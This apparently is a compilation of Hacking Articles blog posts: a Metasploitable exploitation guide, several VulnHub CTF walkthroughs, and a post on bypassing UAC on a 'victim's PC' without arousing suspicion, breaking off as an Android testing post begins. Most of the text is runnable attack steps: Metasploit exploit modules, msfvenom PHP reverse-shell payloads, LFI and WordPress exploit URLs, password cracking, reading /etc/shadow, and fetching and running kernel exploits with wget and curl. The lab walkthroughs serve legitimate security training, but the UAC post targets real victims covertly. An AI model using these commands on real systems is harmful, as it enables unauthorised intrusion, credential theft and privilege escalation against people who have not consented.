Metasploitable is a voluntarily created vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities Based virtual machine which helps us to conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware products and other visualization technologies such as VirtualBox. You can download metasploitable from–> https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploit table is an exploitable framework which help us to improve our skills and also help use to use every port to our advantage as we all know that ports and protocols are the foundation of hacking so, therefore, the more you can take benefit off of the victim.

In this we will walk through the whole concept of metasploitable including how to install it and how to hack it step by step. We will take all the ports one by one which re vulnerable and try to exploit them. So, firstly you have to download metasploit from the above link. After the downloading is complete open VMware and click on Open a virtual machine.

 Locate the VMware image of metasploitable that you just downloaded and click on OK.

After clicking on OK the metasploitable will open in virtual machine and to run it just click on Power on this virtual machine and it will run your metasploitable.

On the verge of getting started it will ask you for username and password. Now, by default the username and passwords are: msfadmin and msfadmin respectively. Once you enter username and password your metasploitable will start.

Now that our vulnerable Linux machine is running and now type the ifconfig command to get the IP address

Now for penetration testing on the metasploitable go to the terminal of your Kali Linux and scan the IP of metasploitable through nmap so that we can which ports are open and this type:

nmap -sV 192.168.1.106

Due to the nmap command we can see which port is open and which service is going on which port, therefore, we can start our attack one by one to every vulnerable port. So, first we will attack on vsftpd2.3.4. As we know that this version is vulnerable, so let us exploit it. For this, open metasploit and type:

search vsftpd 2.3.4

Typing the above command will show the exploits that will help you in attack the said version. So further type:

 use exploit/unix/ftp/vsftpd_234_backdoor

set rhost 192.168.1.106

set rport 21

exploit

Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve.

Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as :

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.106

set rport 22

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username.

Now we can use that password to the shell of metasploitable and for this just got to the terminal of Kali and type:

ssh msfadmin@192.168.1.106

Here,

ssh –> is the service through which we are exploiting

msfadmin –> is the password

192.168.1.106 –> is the victim’s IP address

Upon execution you can see that you will automatically enter its shell.

Now, we will try and attack via telnet which works on port 23. This port will also help us to find password first and then we can enter its shell. So, for this type:

use auxiliary/scanner/telnet/telnet_login

set rhosts 192.168.1.106

set rport 23

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

Similarly, as ssh, it will also start dictionary attack and step by step it will find the correct password. Now that you have the password you can log on to metasploitable.

telnet 192.168.1.106

After typing so, it will ask you for the username and password and once you enter these you will enter the metasploitable as shown below:

Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type:

use exploit/multi/http/php_cgi_arg_injection

set rhost 192.168.1.106

set rport 80

exploit

After the execution you will enter a meterpreter session of metasploitable as shown.

Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit:

use exploit/multi/samba/usermap_script

set rhost 192.168.1.106

set rport 139

exploit

The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit.

Now, we will use the following exploit:

use exploit/multi/misc/java_rmi_server

set rhost 192.168.1.106

set rport 1899

exploit

Again, after you hit enter button on your keyboard you will have a meterpreter session.

The next exploit is:

use exploit/linux/postgres/postgres_payload

set rhost 192.168.1.106

set rport 5432

exploit

Once the command is executed you will enter the meterpreter session as shown above.

The exploit that use is related to unreal ircd and to search its exploit type :

search Unreal ircd

And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one.

To the exploit type:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set rhost 192.168.1.106

set rport 6667

exploit

And when you will hit enter you will obtain a shell session meaning you will enter the shell of the metasploitable.

These are all the attacks that you can use against metasploitable and in the process you can learn how to attack a real life victim using different ports.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Penetration Testing Skills Practice with Metasploitable (Beginner Guide) appeared first on Hacking Articles.

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access.

Download From Here

Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP’s present in our network, so go to the terminal of you Kali and type :

netdiscover

Target IP = 192.168.0.105

And to know that we start our penetration testing. So, first, we will now scan with nmap, we will apply an aggressive scan as it gives detailed information and is fast. The command is :

nmap -A 192.168.0.105

We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306.

Our target IP is 192.168.0.105 as its MAC Vendor is VMware. It is our best shot but also to be sure let us check this IP on our browser. We can crosscheck it from our browser as port number 80 is opened i.e it can open in browser. In the browser we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it and for we must know username and password.

As we need to know about username and password, we will use nikto command to find out the file which is storing them. Nikto helps us to know all the file names and the data they are containing. And the command to for this is:

nikto -h 192.168.0.105

As you can see /config.php: PHP Config file may contain database IDs and password is the file that has username and passwords. Now that we know the file name we can use curl command to find out the data of the file.

Curl is a computer software project providing a library and command-line tool for transferring data using various protocols. The cURL project produces two products, libcurl and cURL. It was first released in 1997. The name originally stood for “see URL”.

And the curl comand is:

curl http://192.168.0.105/index.php?page=php://filter/convert.base64-encode/resource=config

And the highlighted part into he above image is our result and has the information about username and passwords. But note that the information is in base64 code which we will have to decode in order to read it.

And to decode it we will use HackBar. HackBar is an add-on of Mozilla that contains various functions but the most important one is that it helps us to encode and decode base64 codes.

To decode copy the string and go to hackbar and click on encoding option. A drop down menu will appear, now select decode option.

A dialog box will open, paste the copied string on the text box and click on OK.

The decoded result will appear in your hackbar in a readable form. And this way you will have your username and password.

So, the username is root and password is H4u%QJ_H99.

Now we use sql command to see the username and passwords. And the sql command is:

mysql -h 192.168.0.105 -u root -p Users

After typing the command it ask the password, so here enter the decoded password and press enter.

And so, you will have the usernames and password as in this case the usernames are kent, mike, kane with their passwords. These passwords are in base64 code and to decode it use the hackbar as we used earlier. Also shown below:

And like this we will have our password.

Now that we have our username and password, we need to create a php file that we will upload. This raw file we will make through msfvenom. And the command is:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Once the file is generated copy the code from <?php to die(); And past it in a text file and after that change its extension to .php

Now if you try to upload this file you will get an error saying that not allowed extension, please upload images only. So, therefore, you will need change the extension of your .php file.

Before changing the extension you need to add GIF98 at the top of the code as shown below, also change the extension to .gif

After changing the extension when you will try to upload the file you will succeed.

Once the file is uploaded, we still need a way to execute this file. And for that right click on that file and click on copy image location option.

As of now you have copied image location, now you need to install Tamper Data. Tamper Data is a Firefox Extension which gives you the power to view record and even modify outgoing HTTP requests. It helps you to capture cookies and http requests.

Open Tamper Data and click on Start Tamper.

A dialog box will appear. From it clicks on Tamper button on the right corner.

By doing so a dialog box will appear. Keep this dialog box open in the background and open metasploit meanwhile

After opening metasploit type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Running the above commands will helps you gain a meterpreter session of the lab.

Now go to that dialog box of tamper data which was open in the background. In the dialog box you can see there is a option of cookie. In the adjacent text box to the cookie option delete whatever was written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and had copied it after that.

By doing so you are commanding tamper data to execute your own malicious file instead of running its code which helps us to capture the cookies. After giving the path, the second you will click on OK, you will have you meterpreter session.

But this is not enough as we still need to bypass admin. And if you go to the shell of the lab and try to switch user, you will note that the command will show error. To gain the full access of PwnLab you will still need to follow some commands. So, therefore, type:

echo ‘import pty; pty.spawn(‘ /bin/bash’) ” > /tmp/asdf.py

python /tmp/asdf.py

The execution of the command will take you inside the PwnLab and if you try to switch the user; you wil succeed. To switch the user command is:

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

After the execution g of it, you will enter the user kane.

Next, if you type ls command you will that there is a folder named home in the user that we just entered. So, will go into that folder and to do so, type;

cd home

As you have entered the home folder, type:

 ls -lsa

This command will show you all the users in the home ith all the details. So, now t hat you know how many users are t heir and what are their usernames, go back to kane user and for that type :

cd kane (this command will bring you back to the kane user)

ls -lsa (this command will list all the folders present in the kane)

As you can see in the image below, there is file in kane user called msgmike.  Let us try to open it and therefore, type :

./msgmike

If you try to open it, it will give you error saying such file doesn’t exist. So, now let us change user and see if we can open this file from another user type :

cd ..

cd kent

cd mike

You can see that permission to every other user is denied. So now, type:

echo ” /bin/bash” > cat

chmod 777cat

With theses above commands we are using cat command which allows us to create single or multiple files, view contain of file, concatenate files and redirect output in terminal or files. After creating the file we are giving it permission to access through chmod command.

Then further type:

export PATH=. : $PATH

./msgmike

Once the above command is executed, we will have access to msgmike file as we desired and have entered other user named mike. Now if you type:

id

You will see that the above command will show you all the users and will also inform you which administrator user is.

Now that you are in the user mike open the home folder and then go to mike folder. And the type:

./msg2root

test; /bin/sh

id ( this command will show you the users)

whoami (this command will tell you that you are the administrator)

ls (it will show the list of files in the root)

cat flag.txt ( this command will execute flag.txt which was our main motive)

This was an excellent challenge. It requires us to think outside of the box, correlate findings, and manually validate vulnerabilities. This was a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found during this engagement. This challenge also demonstrates the importance of validating user input. 

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Penetration Testing in PwnLab (CTF Challenge) appeared first on Hacking Articles.

This is our another article of root2boot penetration testing challenge. We will walk through a exploitable framework Mr. Robot. It is based on the TV show, Mr. Robot, it has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First Download the Mr Robot Lab from here

First of all we have to find its IP address and for that go to the terminal of your Kali and type :

netdiscover

Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.0.102, let us scan it.

To scan our target IP we will use aggressive scan(-A)

nmap -A 192.168.0.102

The scan’s result shows us the open ports are : 22, 80, 443. As the 80 port is open we can try and open this IP in our browser.

And yes, it opens which further confirms our target.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type :

nitko -h 192.168.0.102

From the result we can gather that there a text file with the name of robots.txt which might provide us with some further information. So now let us try and open this file in the browser

Opened the key-1-of-3.txt file from the browser and I also had the first of the 3 keys mentioned in the readme.

Now open fsocity.dic file in browser which is a dictionary file. Let us first try and open this dictionary file the browser.

Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contains username and passwords.

So now that we know we might have username and passwords, we will try and logon into our target. One by one we have tried every username and it has given the error that the username doesn’t exist.  But when we used the name elliot it gave us the error that the password is incorrect.

With this we know one thing for sure that elliot is a correct username and now we just have to find a password for it.

Our best guess to find the password the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file. For this open WPScan in the terminal of Kali and type :

ruby ./wpscan.rb –url http://192.168.0.102 –wordlist /root/Desktop/fsocity.dic –username elliot

Here,

./wpscan.rb –> starts the WPScan

–url –> denotes the URL onn which WPScan will work

http://192.168.0.102 –> is our URL

–wordlist –> denotes the path of the dictionary file

–username –> denotes username

elliot –> username

Once the command starts working it will take its time to execute as the dictionary file we got is huge. So, sit back and relax and let the WPScan do its work.

When the execution is completed (which may time much time as in our case it took almost 4 hours)  you will have the password for the username elliot which is ER28-0652.

Using the password, logon in to the target.

One you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php to die(); and paste it on template(and save it)

Now you have access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the msfvenom generated shell

And simultaneously open metasploit and type :

Use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Once the exploit is executed, open the path of the template in the browser as shown :

Browsing to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php and press enter

Once you open the template path in the browser then you will have a meterpreter session and once you have it, go to the shell and type :

echo import pty; pty.spwan(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

After doing the above, you will enter a user of our target and to know all the information about the user type :

ls -lsa (gives us the information about the user we just entered)

cd home (take us in the folder home)

ls -lsa (gives the information about the home folder0

cd robot (takes us into the robot folder)

Now, to know the information about the robot folder/file we will type :

ls -lsa

We now know that there are two important files, one of them is a text file other is password in the form of MD5. If we try to open the text file by typing :

cat key-2-of-3.txt

It will not open as we do not have the permission to do so. But now let us try and open the MD5 file and for that type :

cat password.raw-md5

Executing the above command will give a MD5 value(hash value) of the password as you can see below :

We will use md5cracker.org (online md5 value cracker) to crack this MD5 value. Enter the MD5 value in to the text box and click on crack/encrypt button

The value will translate to abcdefghijklmnopqrstuvwxyz  as shown below

Now in the terminal try to switch the user to robot by the command :

su robot

Following the command it will ask you for the password. Enter the MD5 cracked password here and you will enter the robot user and to gain its information type :

ls -lsa

Now, try to open the remaining text file by typing :

cat key-2-of-3.txt

here i will read the second key file

Next type the following :

nmap

Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using a nmap “shell” (interactive shell). 

nmap –interactive

With the above commands you will enter nmap then type :

!sh

id (to know the users)

cd /root (lets you to enter root)

Once you have enetered the root, type :

ls -lsa

cat key-3-of-3.txt

And upon the execution of we will obtain 3 of 3 keys, hence entering Mr. Robot. There are many ways to perform the above but this methods is the easiest. We hope you find it effective and interesting and it helps you to improve.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Mr. Robot VM (CTF Challenge) appeared first on Hacking Articles.

Microsoft is increasing its security with the evolution of their windows. And with that it is getting more and more difficult to hack them. It is often said “where there is will; there is a way”, threfore thankfully it is not impossible to do so. Once you have hacked into WIndows 10 PC then it is difficult to gain it administrator access without getting your victim suspicious. Therefore, we present you a new way to do so.

Move along with following steps and you will learn how to gain administrator access of windows 10 PC without the Victim’s suspicion.

First of all, to learn to how to hack victim’s PC click here.

After hacking when you have gained a meterpreter session then type :

getsystem

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry. Just download this Tpinit file from –> here

And now upload the said file into victim’s PC by typing :

upload /root/Desktop/TpmIniyUACBypass.exe d:\\

Here,

upload –> is use to upload a file

/root/Desktop/TpmIniyUACBypass.exe –> is the path of the file that is to be uploaded

d:\\ –> is location of where the file will be uploaded in victim’s PC

As the file is uploaded, open metasploit simultaneously and type :

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 102.168.0.106

set lport 443

exploit

Once this exploit is executed. go to the meterpreter session that you previously had and type :

shell

Typing shell will take you to the shell of the PC. Now further type :

d: (This command will take into the D Drive of victim’s PC i.e where you upload your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command will execute your uploaded file)

As the command will make our file execute we will have a session with administrator privileges as shown

This way it is quite easy to bypass administrator access in windows 10. Thus, nothing is impossible in hacking.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack Admin Access of Remote Windows 10 PC using TpmInit UACBypass appeared first on Hacking Articles.

In this article we will complete a root2boot challenge of Capture the Flag series. This is Walkthrough of droopy which is a vulnerable framework but it is little bit complex too. Download it from –> Here

Walkthrough

Let us start by scanning the network so that we can know the IP of our target. And to scan the network types the following:

netdiscover

Our target IP is 192.168.1.103. Now that we know our target let’s scan it, therefore, type:

nmap -A 192.168.1.103

From scanning, we gather that port number 80 is open and that it has Drupal’ version 7 which is known for its vulnerability. So let us start exploiting it so that we have our meterpreter session. To exploit open metasploit and type:

search drupal

Searching the exploit for drupal will list the various exploits. From the exploits you need to use drupal_drupageddon exploit. Now, type:

Now type use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (IP of Remote Host)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit

Upon the execution of the above exploit you will have a meterpreter session. And once you have the meterpreter session then type:

Running the following command will allow you to have better visibility of the path that you are in

shell

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now using the above commands we have entered the terminal. Our next step is to find the kernel version of Ubuntu. TO know the said type:

lsb_release -a

We, now know that our target is using Ubuntu 14.04 Let us try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:

We already now know that this exploit is not available in metasploit from the site below:

Now to download the exploit we have to find a writable file to download the exploit. Next I need to find a directory I can write to and run scripts from.

find / -writable -type d 2>/dev/null

cd /tmp/ (It will take us into the /tmp folder)

wget https://www.exlpoit-db.com/download/37292 (This will download the exploit)

Now, we have over the downloaded file and compile it and then run it so have the control of root. To do so, commands are:

mv 37292 37292.c (It will move the file and renamed it)

gcc 37292.c -o kernel (This command will compile the file and output save it as kernel)

chmod 777 kernel (It will give you the permission to execute the file)

./kernel (It will execute the file)

After executing the above commands we will enter the root. To confirm it let us try a command:

whoami (This command will inform you that you are root)

cd /root (it will take into the /root folder)

ls (it will list all the files present in the root folder)

We have found a file named dave.tc. If you open the file in the browser it will say to download the file. OK! Let’s download it.

We can easily get to /var/www/html/sites from the web front end so let’s copy dave.tc there

Cp dave.tc /var/ww/html

Let’s open the file from VeraCrypt. It’s the software which will help you to mount the file so that you can open it. Download it from –> https://veracrypt.codeplex.com/wikipage?title=Downloads

When you open VeraCrypt, select 1 so that it will mount the disk into 1 disk.

When you try to open it, it will ask you a password. Now we don’t have the password, let us explore and find it

First of all let us explore the file which contains all the hash values. We all know the hash vales are in shadow folder. And to read it the command is:

cat /etc/shadow

We have the hash value of root. Now, let us check which hash is used. We check an online hash identifier to do our work. Search Google for “online hash identifier“

We have used onlinehashcrack.com. Copy and paste the hash on the site. Result is showing us that the SHA512 is used to crypt it.

While exploring we also found a mail. Let us read it and therefore type:

cat /var/mail/www-data

Now reading the mail we know certain things for sure and they are:

• password is of 11 characters
• password is related to academy

To find our password we will first run a command which will filter our rockyou.txt file. We will strongly suggest you to filter it as we know it contains 8M passwords. If we run the txt file as it is then it will take whole day to find the password. So to filter it we will apply three conditions that the words we will collect should be in lower case and should have academy word in it.

(Refernce : https://kaizensecurity.wordpress.com/2016/04/29/droopy-v0-2-solution/)

To do so, the command is:

awk ‘length($1) == 11 { print $1 }’ /usr/share/wordlists/rockyou.txt |egrep ‘^[[:lower:]]+academy’ > /root/Desktop/pass.txt

Now that we have our txt file filtered, we will find the password using truecrack. The command is :

truecrack –truecrypt /root/Download/dave.tc -k SHA512 -w ?root/Desktop/pass.txt

Using the above command you will have you password in minutes. Now that we have our password, we will try and mount the drive from VeraCrypt again. Follow the same procedure as earlier and then add the password and check the true crypt mode.

When you will click on OK. You will have the mounted drive in your Desktop

Open the drive by double clicking on it and go to .secret and then open .top and that last you will have flag.txt

VOILA!! You have achieved the flag!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Droopy VM (CTF Challenge) appeared first on Hacking Articles.

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to reconnaissance, enumeration, and exploits this vulnerable machine to get root access and to read the contents of flag.txt. We have been told that are various methods to do so but we have tried and found the simplest way.

Download the stapler vm from here

WalkThrough

 Start off with scanning the network to find our target. And we all the command for it is:

netdiscover

We found our target –> 192.168.1.105

To scan our target we will use Sparta. Sparta is combination of nmap scanning and Nikto. It makes our work simpler. To open Sparta, Open kali linux > Applications > Information Gathering > Sparta. After opening Sparta, click on where it says “click here to add host to scope”.  A dialog box will open asking target’s IP. Give your target’ IP there and click on add scope.

Once Sparta starts working, it will show you all the ports open on our target.

Result shows us that port number 21, 22, 53, 80, 137, 139, 666, 3306, 12380 are open.  The Nikto tab in Sparta of port number 80 shows us that we can open our target IP in browser also it provides us with the information that /.bashrc and /.profile are the files which may contain useful information.

Firstly, we will open our target IP in the browser to see if we find anything.

As you can see that we do not find anything upon opening the target IP in the browser.  So, then we tried to open the two files which we found with the help of Nikto.  When we open that file it asks us to download a file. No harm in that. So we downloaded the file.

We regretted doing so as there was nothing in both of these files. It was useless to do so. So we explored more of Nikto has to provide and found out that we could exploit port number 21 which has FTP service. Nikto took the liberty of using hydra and finding the username and password of ftp which is ftp and password respectively.

Now that we had username and password, so, we tried to exploit it through the terminal of kali by typing :

ftp 192.168.1.105

ftp (username)

password (password)

And again we found nothing in it. Similarly, we tried to exploit port numbers 22, 139 and 666 respectively. Alas! We found nothing. Again!

So we decided to explore Nikto more and we found that there was a robots.txt file on the port number 12380 with two entries. We also noticed that the site had SSL security which meant it will only open with prefix https://

So firstly we tried opening it in browser with port 12380.

Finally, something happened! The site opened on the port 12380. Then we tried to open robots.txt (https://192.168.1.105/robots.txt) and we found two entries i.e. /admin112233/ and /blogblog/

We opened them one by one only /blogblog/ proved to be useful as a blog opened in it.

Studying this blog we have established that the blog is made off Word Press. Now obviously use WPScan to know all about the blog. To apply wpscan we have come up with a 3-in-1 command as it will tell us all about the theme and plug-ins as well as usernames and the command is:

wpscan –url https://192.168.1.105/blogblog/ –enumerate ap –enumerate at –enumerate u

The wpscan has also informed us about the upload directory as we have highlighted in the above image.

Completing the scan and we found one plug-in i.e. advanced video plug-in and we searched for its exploit on www.exploit-db.com and found one exploit for it

Traversing the exploit we found the correct command to execute and use it to our advantage and the command is:

http://127.0.0.1/wordpress/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]

We formatted the command as per our usage

http://192.168.1.105/blogblog/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When our formatted URL will be executed, it will show us an error. Also, if you will pay attention there will be some changes on the WordPress blog.

It gives us an image. We already know where is upload directory (from WPScan) so we can directly go there to view/download the image. And for this our URL will be:

https://192.168.1.105/blogblog/wp-content

Now if we try to open this image or download it then it will show us an error as same as shown below:

The trick here is to download the image file without any extension. Run the following command to read the image:

cat 1439829871

This provides us with the username and password of MYSQL. To enter the MYSQL database we will use third-party tool called HeidiSQL_9.3_Portable.  

Open the tool; give target IP in hostname, username in user and password in password. Then click on OK.

Clicking on OK we will enter the database.

Click on wp _users to see the usernames and passwords of all the users.

As you can see that all the passwords are encrypted. So now we will apply dictionary attack using WPScan to the first username that we had found which was john with the help of rockyou.txt. The command to do so is:

wpscan –url hhtps://192.168.1.105/blogblog –wordlist /usr/share/wordlist/rockyou.txt –username john

Once the attack is completed we will have the password for username john i.e. incorrect.

Now we will logon using the said username and password.

As we have logged in, all now we have to do is to create our PHP code to upload so that once the code will execute we will have its session. To generate the code type:

msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.105 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension.

Now, as we already logged on, go to plugins option then select add plugin option. Click on browse option and select the PHP in which you have just saved the code and click on OK.

Now go to the upload directory and double click on the you just uploaded.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter’s session. Further type:

shell

And then type the combination of two following commands to import and running the python file to reach the terminal:

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

 Now, we will check the Ubuntu version so that we can find its exploit and so type:

lsb_release –a

 Now with the following command we will find a writable folder:

 find / -writable -type d 2>/dev/null

We now know that our target is using Ubuntu 16.04 so we will try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:

We already now know that this exploit is not available in metasploit so we will copy its code to download it as shown:

Now, we need to go into the desired writable file and for that type :

cd /tmp

And then to download the exploit type:

Wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

When we download the exploit, zip files are downloaded and now unzip it and for that type:

unzip 39772.zip

Open the unzipped file by typing:

ls

cd 39772

Now we have a tar file named exploit.tar. Open it with the following command:

tar -xvf exploit.tar

Now use the ls command to view the directories. Now we will go into the double put-exploit folder and for that type:

cd ebpf_mapfd_doubleput_exploit

ls (list the directories)

./compile.sh (will run the compile.sh)

./doubleput (will run the double.sh)

whoami (will tell you where you have reached)

cd /root (will take you into /root)

ls (shows you the directories of /root)

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Stapler VM (CTF Challenge) appeared first on Hacking Articles.

Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares. This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/

Walkthrough

First things we need to know what IP did the VM got. So naturally scan the network using:

netdiscover

Now that we have located our target IP i.e. 192.168.0.104, our next step is to scan it.

nmap -A -p- 192.168.0.104

Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.

On opening the target IP on the browser we did not get much information, therefore, we will use curl command to find out more about our target.

curl -v http://192.168.0.104/

Now if you onto the source code, you can see that the word “commorode64” used a lot. So we opened it in the browser (192.168.0.104/commorode64) and to our luck we found another page.

Then we decided to look into its page source.

As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :

• the password is in lowercase
• password has 3 letters and four digits
• and it is related to c=64 sound chip

After loking into the page source we tried to explore it more with nikto.

nikto -h http://192.168.0.104/commodore64/

Exploring through nikto proved helpful as found an index.php file so we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.

Getting the above hints about password, we firstly decided to look up c=64 sound chip on wikipedia. And we found:

We knew that password’s first three digits are alphabetic letters and so our best guess is MOS are the first three digits of the password.

Now everything falls on the last four digits of the password and finds that we used crunch command.

crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt

Crunch will generate your dictionary file.

And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:

Now on the index.php page enter the username and password. Following page will open and on this page you have to upload a malicious php file.

Entering the password you will logon to the following page:

Now to generate the said php open the terminal in your Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter’s session. Further type:

shell

And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of pythin is updated :

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

So to solve this problem you need to run a different set of commands i.e. :

pythin3.5 -c ‘import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

bin/bash

Now you will reach the terminal. Here, type the following command to know the version of kernel :

lsb release -a

Now that we know the kernel’s version we will search it’s exploit in www.exploit-db.com

Exploring the exploit you will find the code that will download it.

Now we have the exploit that is to be downloaded, so we will find a writable file to download it and for type:

find / -writable -type d 2>/dev/null

Then download the file go into the said file and for type :

cd /tmp

Now in the /tmp folder if you try to download a file with wget command it will show an error so we will have to use curl command this time:

curl -O https://raw.githubusercontent.com/ofensive-security/exploit-database-bin-sploits/master/sploits/39772.zip

Now unzip the file by typing:

unzip 39772.zip

Open the unzipped file by typing:

cd 39772

Now we have a tar file named exploit.tar. Open it with the following command:

ls

tar -xvf exploit.tar

And now move into the doubleput.c by typing:

cd ebpf_mapfd_doubleput_exploit

Moving forward, type:

 ls (list the directories)

./compile.sh (will run the compile.sh)

./doubleput (will run the doubleput.c)

whoami (will tell you where you have reached)

cd /root (will take you into /root)

ls (shows you the directories of /root)

Now we are in the root of our target. Now let’s see what it has to offer us and for that type:

ls -lsa

We have all the files listed and from the list we will try and open hint.gif but first we have to copy it therefore type:

cp hint.gif /var/www/html

Now if you will open hint.gif in the browser then it will show you the following image:

So, we will try to check other files too like commodore64, so type :

cd .commodore64

And again to see what it has to offer us type:

ls -lsa

From all the files listed we will open the following:

cd .miami

ls -lsa (it wil further list the folders)

cd vice (enter into vice)

flag.zip

Don’t get too excited we have obtained the flag. We still have to open it. And here is the trick, if you try to open the zip file it will ask you for the password. So, we will try to open it in for browser and for that we first have to copy it so type:

cp flag.zip /var/www/html/commodore64

When you open it in the browser it will ask you to download flag.zip. So, download it.

We will apply dictionary attack using rockyou.txt so for this the command is:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip

And yes, at last you have the password. So now unzip the flag.zip by typing:

unzip flag.zip

Then it will ask you the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Sydney VM (CTF Challenge) appeared first on Hacking Articles.

Nowadays mobile user’s area unit increasing day by day, the protection threat is also increasing along with the expansion of its users. These threats can disrupt the operation of the smart phone, and transmit or modify user data. For these reasons, the applications deployed there should ensure privacy and integrity of the info they manage. Mobile security involves protecting personal and business information continues and transmitted from good phones, tablets, laptops and totally different mobile devices. Mobile security has become very important in mobile computing as a result of the day these days increase inside the delicate attack methods.  So, now we will see how to exploit and analyze the android application for vulnerability.

So first we have to setup an environment for android application testing.

Requirements for android penetration testing:

• Virtual Box
• Santoku OS which come with preinstalled SDKs.
• GenyMotion for creating Android Virtual Device ( AVD)
• A vulnerable android app “InsecureBankv2”.

